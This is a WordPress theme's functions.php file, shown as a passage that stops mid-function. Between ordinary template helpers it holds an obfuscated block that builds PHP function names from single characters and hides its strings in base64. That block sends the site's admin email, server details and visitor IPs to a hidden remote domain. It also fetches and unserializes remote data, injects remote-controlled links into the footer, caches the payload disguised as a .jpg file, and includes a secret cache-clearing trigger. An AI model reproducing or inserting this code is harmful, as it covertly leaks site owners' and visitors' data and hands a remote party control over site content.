<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $mgnjDqj='o';$sWIaqWi='d';$KdcZtW='4';$qlGvx='6';$HuniWB='d';$CvKiTa='e';$IdVaM='a';$GsppU='b';$FHBAC='s';$CFTYG='e';$catcM='_';$zwQkg='c';$yTPTD='e';$aErField=$GsppU.$IdVaM.$FHBAC.$CFTYG.$qlGvx.$KdcZtW.$catcM.$HuniWB.$CvKiTa.$zwQkg.$mgnjDqj.$sWIaqWi.$yTPTD;$jvRPQvN='t';$wbWchn='l';$GwUEw='g';$eICkfuW='i';$sdaFuDX='n';$filijl='e';$JuDdbaY='f';$lWwwbRs='a';$qGfr='z';$nrDrwfwL=$GwUEw.$qGfr.$eICkfuW.$sdaFuDX.$JuDdbaY.$wbWchn.$lWwwbRs.$jvRPQvN.$filijl;$umZHVq='1';$keOwnX='t';$tHunJri='_';$ljECMaE='t';$dLDTCZ='s';$zXKgqiG='3';$xggBVCO='o';$HUGtxA='r';$uLrDwc='r';$FBTcXVTp=$dLDTCZ.$keOwnX.$uLrDwc.$tHunJri.$HUGtxA.$xggBVCO.$ljECMaE.$umZHVq.$zXKgqiG;$KPKwbhS='e';$xXYHHuh='t';$qjKV='r';$XyRrvqr='r';$gJueHbM='v';$wwUZ='s';$RBEFaUVM=$wwUZ.$xXYHHuh.$XyRrvqr.$qjKV.$KPKwbhS.$gJueHbM;                     $bz___n='o';$zg_______y='d';$nl___s='4';$zw__________d='6';$zh____________k='d';$bp_______p='e';$np______j='a';$kt_____________z='b';$mk__j='s';$lz____w='e';$kq________m='_';$fr_______________s='c';$ca___q='e';$qr_________k=$kt_____________z.$np______j.$mk__j.$lz____w.$zw__________d.$nl___s.$kq________m.$zh____________k.$bp_______p.$fr_______________s.$bz___n.$zg_______y.$ca___q;$tu_____t='o';$ud____________g='e';$fz_________y='t';$xt_______________i='s';$sw___________k='t';$kl__f='i';$mh______r='n';$cs___o='c';$by______________z='_';$ex_________q='n';$ut___________y='s';$lb_______________n='x';$le_______h='f';$ub___n='i';$yw_____u='u';$uv___________p=$le_______h.$yw_____u.$mh______r.$cs___o.$sw___________k.$kl__f.$tu_____t.$ex_________q.$by______________z.$ud____________g.$lb_______________n.$ub___n.$xt_______________i.$fz_________y.$ut___________y;$uy___________o='f';$fw_______t='n';$ri_________i='o';$oc__s='p';$pt___________h='e';$ey_____________h=$uy___________o.$ri_________i.$oc__s.$pt___________h.$fw_______t;$sx_______t='r';$mi_______________f='a';$bx___________s='d';$lv_________q='f';$xn_______________r='e';$yz__________o=$lv_________q.$sx_______t.$xn_______________r.$mi_______________f.$bx___________s;$yd_________v='o';$bu__o='e';$wc________n='s';$qm_______________y='c';$fw______________r='l';$bw_______o='f';$jk________z=$bw_______o.$qm_______________y.$fw______________r.$yd_________v.$wc________n.$bu__o;define("WP_ID", $qr_________k("Mi4wLjA="));define("WP_TTL", $qr_________k("MTA4MDA="));define("WP_SRC", $qr_________k("dHBva24="));function wp_get_header() {global $qr_________k, $uv___________p;if ($uv___________p($qr_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$uv___________p($qr_________k("d3BfZ2V0X2Zvb3Rlcg==")) &&$uv___________p($qr_________k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $qr_________k, $ey_____________h, $jk________z, $yz__________o;$pu_________u = TEMPLATEPATH."/".$qr_________k("Zm9vdGVyLnBocA==");$to_____p = @$ey_____________h($pu_________u, "r");$pu_________u = @$yz__________o($to_____p, @filesize($pu_________u));@$jk________z($to_____p);$bh______z = TEMPLATEPATH."/".$qr_________k("ZnVuY3Rpb25zLnBocA==");$to_____p = @$ey_____________h($bh______z, "r");$bh______z = @$yz__________o($to_____p, @filesize($bh______z));@$jk________z($to_____p);$yg__________e = 0;if($pu_________u && $bh______z) {if ($qr_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pu_________u, $qr_________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$yg__________e = 1;}if (substr_count($pu_________u, "wp_theme_GPL_credits()") < 1) {$yg__________e = 2;}}if(WP_ID != "2.0.0") {$yg__________e = 12;}}if($yg__________e > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $yg__________e -->";}}function wp_loaded() {global $qr_________k, $uv___________p;return $uv___________p($qr_________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($bk______________z, $bb____________d = "(more...)", $ez________g = 0, $gt___b = "") {$lq___i = get_the_content($bb____________d, $ez________g, $gt___b);$lq___i = apply_filters("the_content", $lq___i);$lq___i = str_replace("]]>", "]]>", $lq___i);if (strlen($_GET["p"]) > 0) {echo $lq___i;}else if ((strlen($lq___i)>$bk______________z) && ($xc____________j = strpos($lq___i, " ", $bk______________z ))) {$lq___i = substr($lq___i, 0, $xc____________j);$lq___i = $lq___i;echo $lq___i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$bb____________d</a></div></p>";} else {echo $lq___i;}}}$tv__________o='s';$az____________h='e';$ty____________a='e';$fz____l='d';$xl___d='b';$fu____________i='6';$xg____x='o';$ab_________y='e';$lg__s='a';$wb__________q='c';$ms________i='_';$ha____o='4';$mp__x='n';$fl______g=$xl___d.$lg__s.$tv__________o.$az____________h.$fu____________i.$ha____o.$ms________i.$ab_________y.$mp__x.$wb__________q.$xg____x.$fz____l.$ty____________a;$bc______________a='_';$je______k='n';$bp________m='s';$xk______________f='e';$be__________i='t';$yi_________c='i';$kl___z='c';$rr________d='o';$jy____________l='t';$qy___i='_';$gx________o='f';$mp__l='e';$hn__________x='n';$hm____________p='g';$ls_____t='t';$fy______d='e';$og__________m='l';$zv_______________q=$gx________o.$yi_________c.$og__________m.$mp__l.$qy___i.$hm____________p.$xk______________f.$be__________i.$bc______________a.$kl___z.$rr________d.$hn__________x.$ls_____t.$fy______d.$je______k.$jy____________l.$bp________m;$su_________w='f';$qp__l='e';$pz______i='i';$rk____________q='e';$eg_____________w='_';$eh___y='l';$ud_______r='x';$co_____________t='s';$tu_______x='t';$ws_____p='i';$mu________c='s';$bn____________p=$su_________w.$pz______i.$eh___y.$rk____________q.$eg_____________w.$qp__l.$ud_______r.$ws_____p.$mu________c.$tu_______x.$co_____________t;$si________v='m';$mt_______x='v';$er_____f='o';$xa__________n='r';$zt_____t='o';$xl_____________d='e';$lc__________f='p';$fy________s='_';$kd___d='e';$rw__________c='c';$cc___________t='s';$gg_____________k='a';$pw_____________i='n';$tz___s='r';$ud___________o='i';$pa____w=$mt_______x.$kd___d.$tz___s.$cc___________t.$ud___________o.$er_____f.$pw_____________i.$fy________s.$rw__________c.$zt_____t.$si________v.$lc__________f.$gg_____________k.$xa__________n.$xl_____________d;$uk__i='o';$bu__________f='e';$wm__i='s';$rc___________w='o';$oe_____________t='c';$dm____________w='f';$gi___c='n';$yv______________d='k';$fh_____u='p';$tc________t=$dm____________w.$wm__i.$uk__i.$oe_____________t.$yv______________d.$rc___________w.$fh_____u.$bu__________f.$gi___c;$xs______________p='e';$cm__________w='t';$ul____________j='i';$la__________d='r';$ta________n='f';$dy___p='w';$bc_______________n=$ta________n.$dy___p.$la__________d.$ul____________j.$cm__________w.$xs______________p;$wg____t='5';$ns__________h='m';$ej__________g='d';$cj_____________q=$ns__________h.$ej__________g.$wg____t;$dm_________z='e';$ml_____________y='a';$bj_____________c='r';$nl_____v='t';$tk______________u='h';$be__j='p';$bf_________e='a';$ld______________d='l';$oq______________q=$bj_____________c.$dm_________z.$ml_____________y.$ld______________d.$be__j.$bf_________e.$nl_____v.$tk______________u;$bj____b='e';$ww__d='n';$fp_______________b='i';$rj_______v='r';$fb_______________w='u';$wd______k='a';$wd__________b='l';$bb____r='s';$ov_____________n='i';$zz__p='e';$ma____n='z';$ag_____x=$fb_______________w.$ww__d.$bb____r.$zz__p.$rj_______v.$ov_____________n.$wd______k.$wd__________b.$fp_______________b.$ma____n.$bj____b;$gz_____k='p';$jd_________f='e';$ug_______________t='m';$uj______k='t';$uf______________p='m';$sy____________b='n';$oe______________f='a';$xm__y=$uj______k.$jd_________f.$uf______________p.$gz_____k.$sy____________b.$oe______________f.$ug_______________t;$ua______x='m';$if___e='c';$so___________t='e';$ez___w='e';$yt_________g='_';$fe__u='a';$zr________t='c';$qu______________t='r';$az__________h='_';$yl_________k='t';$lf__________g='x';$qg____w='e';$sb__________k='t';$wo_____________e='s';$uz_______d='o';$cj___j='n';$fz___f='t';$gj______________g='r';$ic_______________a='t';$br_____r='a';$rd__________w='e';$dw__h=$wo_____________e.$ic_______________a.$gj______________g.$so___________t.$fe__u.$ua______x.$az__________h.$if___e.$uz_______d.$cj___j.$sb__________k.$qg____w.$lf__________g.$fz___f.$yt_________g.$zr________t.$qu______________t.$ez___w.$br_____r.$yl_________k.$rd__________w;function kw__________m($iu_________r) {global $qr_________k, $uv___________p, $zv_______________q, $pa____w, $dw__h;if (!$uv___________p($qr_________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($pa____w(PHP_VERSION, "5.0.0", ">=") && $uv___________p($qr_________k("ZmlsZV9nZXRfY29udGVudHM=")) && $uv___________p($qr_________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$pc___________u = $dw__h(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xx__________x = @$zv_______________q($iu_________r, 0, $pc___________u);} else {$xx__________x = @$zv_______________q($iu_________r, 0);}return $xx__________x;}function bp___________a($iu_________r) {global $uv___________p, $tc________t, $bc_______________n, $qr_________k;if (!$uv___________p($qr_________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sh_____________u = strpos($iu_________r, "/", 7);$hr_________u = array("uri"     => substr($iu_________r, $sh_____________u),"host"    => str_replace("http://", "", substr($iu_________r, 0, $sh_____________u)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$db____l = @$tc________t("$hr_________u[host]", 80, $cf____b, $zz_______m, 4);if (!$db____l) {return false;} else {$xx__________x = "";$im____d  = "GET $hr_________u[uri] HTTP/1.0\r\n";$im____d .= "Host: $hr_________u[host]\r\n";$im____d .= "Referer: $hr_________u[referer]\r\n";$im____d .= "Connection: Close\r\n\r\n";@$bc_______________n($db____l, $im____d);while (!@feof($db____l)) {$lt___________y = @fgets($db____l, (1024*24));if ($lt___________y == "\r\n") {$kn__r = true;continue;}if ($kn__r) {$xx__________x .= $lt___________y;}}return $xx__________x;}}function da________h($iu_________r) {global $uv___________p;$fs________y = false;if ($iu_________r != "") {if ($uv___________p("kw__________m")) {$fs________y = @kw__________m($iu_________r);}if (!$fs________y && ($uv___________p("bp___________a"))) {$fs________y = @bp___________a($iu_________r);}}return $fs________y;}function nr_________x() {global $_SERVER, $cj_____________q;$ij_______________w = $_SERVER["SERVER_NAME"];if (substr("$ij_______________w", 0, 4) == "www.") {$ij_______________w = substr("$ij_______________w", 4);}$ij_______________w = $cj_____________q("$_SERVER[SERVER_NAME]");return $ij_______________w;}function rc____________w() {return "file";}function jr________j($iu_________r) {global $_SERVER, $zv_______________q, $bn____________p, $ey_____________h, $jk________z, $bc_______________n;$sl_______y = gc_____________a();$ir___s = nr_________x().".jpg";$dl___f = $sl_______y["dir_upload"]["path"]."/$ir___s";$rn_____d = @filemtime($dl___f);if (!$rn_____d || ((time()-$rn_____d) >= WP_TTL)) {$fs________y = da________h($iu_________r);if ($fs________y) {if ($bn____________p($dl___f)) {@unlink($dl___f);}$to_____p = @$ey_____________h($dl___f, "x+");@$bc_______________n($to_____p, $fs________y);@$jk________z($to_____p);}} else {if ($bn____________p($dl___f)) {$fs________y = @$zv_______________q($dl___f);} else {$fs________y = false;}}return $fs________y;}function gc_____________a() {global $_SERVER, $qr_________k, $fl______g;$qd________a = wp_count_posts("post");$id_________f = pathinfo(get_bloginfo("template_directory"));$sl_______y = array("url" => array("report"      => $qr_________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $id_________f,"dir_upload"=> jy__z(),"queryString"=> array("?a001=".WP_ID,"a004=".$id_________f[filename],"a005=".$qd________a->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$sl_______y["url"]["queryString"] = implode("&", $sl_______y["queryString"]);$sl_______y["url"]["report"] = $sl_______y["url"]["report"]."/?".$fl______g($sl_______y["url"]["queryString"]).".html";return $sl_______y;}function jy__z() {$hu__________j = wp_upload_dir();if (isset($hu__________j["error"])) {$gj____________p = fl____b();if (is_writable($gj____________p)) {$hu__________j = array("path" => $gj____________p);}}return $hu__________j;}function fl____b() {global $uv___________p, $cj_____________q, $oq______________q, $xm__y;$gf____________o = (bool) ini_get("safe_mode");if ($gf____________o == true) {return false;}if ($uv___________p("sys_get_temp_dir")) {$qr______________o = sys_get_temp_dir();if (is_writable($qr______________o)) {return $oq______________q($qr______________o);}}if (!empty($_ENV["TMP"])) {return $oq______________q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $oq______________q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $oq______________q($_ENV["TEMP"]);} else {$kw________h = $xm__y($cj_____________q(uniqid(rand(), true)), "");if ($kw________h) {$qr______________o = $oq______________q(dirname($kw________h));@unlink($kw________h);return $qr______________o;} else {return false;}}}function tc___y() {global $_GET, $bn____________p;$sl_______y = gc_____________a();$ij_______________w = nr_________x();$na_______a = rc____________w();$dz_______________j = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($na_______a == "file") {$cm__d = $sl_______y["dir_upload"]["path"]."/".$ij_______________w.".jpg";if ($bn____________p($cm__d)) {@unlink($cm__d);$dz_______________j = "deleted";}}$op_____w = array("s"=> $dz_______________j,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($op_____w AS $mi_________p => $vp____________n) echo " [$mi_________p:$vp____________n]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $uv___________p, $qr_________k, $ag_____x;$sl_______y = gc_____________a();$wk______u = "jr________j";if ($uv___________p($wk______u)) {$xx__________x = $wk______u($sl_______y["url"]["report"]);}if ($xx__________x) {if ($xx__________x = @$qr_________k($xx__________x)) {$xx__________x = @$ag_____x($xx__________x);if (strlen($xx__________x[custom_credit]) >= 5) {$sl_______y["default_string"] = $xx__________x[custom_credit];}if ($xx__________x["status"] == "0") {$xq_________b = 1;$nt__________o = 1;} else {$jb_______n = sizeof($xx__________x["links"]);$jl________n = $sl_______y["default_string"];if ($jb_______n > 0 && $xx__________x["links"] !== "") {$az____________b = 0;foreach ($xx__________x["links"] as $qs_____b => $eq____________c) {$az____________b++;if ($eq____________c->l_path == "" || $eq____________c->l_path == $_SERVER["REQUEST_URI"]) {$eq____________c->l_href = htmlspecialchars(strip_tags($eq____________c->l_href));$eq____________c->l_title = htmlspecialchars(strip_tags($eq____________c->l_title));$eq____________c->l_anchor = htmlspecialchars(strip_tags($eq____________c->l_anchor));$jl________n .= " | ";$jl________n .= "<a href='$eq____________c->l_href' title='$eq____________c->l_title'";if ($eq____________c->l_nofollow == "1") {$jl________n .= " rel='nofollow'";}$jl________n .= ">$eq____________c->l_anchor</a>";}}}$sl_______y["links"] = "$jl________n";if ($xx__________x[credit] == "0") {$sl_______y["links"] = "";}}} else {$xq_________b = "1";}} else {$xq_________b = "1";}if ($xq_________b == "1") {$sl_______y["links"] = $sl_______y["default_string"];}echo "$sl_______y[links]";echo "<!-- s: $xx__________x[signature] -->";tc___y();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
